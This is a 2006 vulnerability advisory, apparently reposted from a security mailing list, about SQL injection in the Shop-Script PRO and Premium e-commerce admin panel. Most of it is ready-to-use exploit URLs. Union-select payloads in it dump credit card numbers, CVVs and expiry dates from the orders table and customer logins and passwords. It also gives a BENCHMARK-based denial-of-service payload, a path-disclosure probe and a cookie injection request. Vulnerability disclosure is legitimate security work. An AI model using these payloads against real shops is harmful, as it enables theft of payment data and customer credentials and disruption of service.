Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  SQuery v.x (devi.php) (armygame.
php) Remote File Inclusion

  [MajorSecurity #26] Woltlab Burning Board - Multiple Cookie manipulation and session fixation vulnerabilities

  MusicBox <= 2.3.4 XSS SQL injection Vulnerability

  XSS в Devium CMS 1.5

From:Cyber Lords <fear_(at)_cyberlords.net>
Date:25 июля 2006 г.
Subject:SQL-Injection in Shop-Script PRO & Shop-Script Premium all version

Advisory: SQL-Injection in Shop-Script PRO & Shop-Script Premium all version.

Home Page: http://shop-script.ru

Уязвимость/Vulnerability:
SQL-injection в зоне администрирования.

Уязвимый скрипт/Vulnerable script: admin.php

http://www.demo.shop-script.ru/premium/admin.php?dpt=custord&sub=ustlist&
customer_details=order_history&customerID=1
[SQL]

http://demo.shop-script.ru/premium/admin.php?dpt=conf&sub=setting&setting
s_groupID=-2
[SQL]

http://demo.shop-script.ru/premium/admin.php?dpt=custord&sub=new_orders&o
rders_detailed=yes&orderID=-107
[SQL]

http://shop/index.php?productID=75&discuss=true&remove_topic=-14[SQL]

http://demo.shop-script.ru/premium/admin.php?dpt=catalog&sub=discuss&prod
uctID=1114&answer=-9
[SQL]

http://demo.shop-script.ru/premium/admin.php?dpt=catalog&sub=iscuss&produ
ctID=-1114
[SQL]

http://demo.shop-script.ru/premium/admin.php?dpt=reports&sub=product_report&
categoryID=-82
[SQL]

http://demo.shop-script.ru/premium/admin.php?dpt=conf&sub=zones&countryID
=-1
[SQL]

http://demo.shop-script.ru/pro/admin.php?dpt=conf&sub=zones&countryID=-1[
SQL]

Exploit:

http://www.demo.shop-script.ru/premium/admin.php?dpt=reports&sub=
product_report&categoryID=-82+union+select+DATABASE(),null,null,null,
null,null,null/*

http://www.demo.shop-script.ru/premium/admin.php?dpt=reports&sub=
product_report&categoryID=-82+union+select+USER(),null,null,null,
null,null,null/*

http://www.demo.shop-script.ru/premium/admin.php?dpt=reports&sub=
product_report&categoryID=-82+union+select+VERSION(),null,null,null,
null,null,null/*

http://demo.shop-script.ru/premium/admin.php?dpt=reports&sub=
product_report&categoryID=-82+union+select+cc_number,cc_holdername,
cc_expires,cc_cvv,null,null,null+from+SS_orders
/*&sort=customers_rating&sort_dir=ASC

http://demo.shop-script.ru/premium/admin.php?dpt=reports&sub=
product_report&categoryID=-82+union+select+Login,cust_password,null,null,
null,null,null+from+SS_customers/*&sort=
customers_rating&sort_dir=ASC

DDoS:

http://shop/pro/admin.
php?dpt=conf&sub=setting&settings_groupID=BENCHMARK(10000000,
BENCHMARK(10000000,md5(current_date)))

Уязвимость/Vulnerability:
Раскрытие установочного пути.

http://shop/admin.php?dpt=modules&sub=shipping&setting_up=2'

HTTP-запрос:

GET http://demo.shop-script.ru/premium/index.php?answer=1&show_price=
yes&save_voting_results=yes HTTP/1.0
Accept: */*
Referer: http://demo.shop-script.ru/premium/index.php?show_price=yes
Accept-Language: ru
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: demo.shop-script.ru
Cookie: PHPSESSID=9b93a5c8a536267b43a19262a1819c30'


/* Все выше перечисленные уязвимости применимы и к Shop-Script PRO */



Copyright © Cyber Lords Community
www.cyberlords.net

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород